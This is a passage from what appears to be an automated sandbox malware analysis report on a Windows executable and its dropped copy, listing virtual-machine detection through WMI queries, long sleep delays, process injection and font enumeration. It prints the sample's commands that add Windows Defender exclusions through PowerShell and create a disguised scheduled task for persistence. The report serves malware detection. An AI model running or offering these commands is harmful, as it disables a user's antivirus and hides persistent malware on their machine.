                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: PzPxqbK89H.exe PID: 7260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: VzwumYUBCtHW.exe PID: 7932, type: MEMORYSTR
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeMemory allocated: 1990000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeMemory allocated: 3400000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeMemory allocated: 3210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeMemory allocated: 8080000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeMemory allocated: 9080000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeMemory allocated: 9230000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeMemory allocated: A230000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeMemory allocated: 2790000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeMemory allocated: 2A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeMemory allocated: 990000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeMemory allocated: 2490000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeMemory allocated: 23A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeMemory allocated: 6EB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeMemory allocated: 69C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeMemory allocated: 7EB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeMemory allocated: 8EB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeMemory allocated: 2BA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeMemory allocated: 2D00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeMemory allocated: 4D00000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5548Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6218Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWindow / User API: threadDelayed 3029Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWindow / User API: threadDelayed 3177Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWindow / User API: threadDelayed 1353
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWindow / User API: threadDelayed 5885
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exe TID: 7280Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep count: 5548 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 104 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exe TID: 8124Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exe TID: 7916Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exe TID: 7852Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe TID: 8064Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe TID: 6468Thread sleep time: -20291418481080494s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe TID: 5344Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe TID: 4176Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeThread delayed: delay time: 922337203685477
                    Source: PzPxqbK89H.exe, 00000000.00000002.1735860178.000000000455D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %aKQEMU
                    Source: PzPxqbK89H.exe, 00000008.00000002.1855054456.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1945242568.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe"
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe"
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeMemory written: C:\Users\user\Desktop\PzPxqbK89H.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PzPxqbK89H.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpBC1E.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeProcess created: C:\Users\user\Desktop\PzPxqbK89H.exe "C:\Users\user\Desktop\PzPxqbK89H.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VzwumYUBCtHW" /XML "C:\Users\user\AppData\Local\Temp\tmpE438.tmp"
                    Source: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exeProcess created: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe "C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe"
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Users\user\Desktop\PzPxqbK89H.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PzPxqbK89H.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
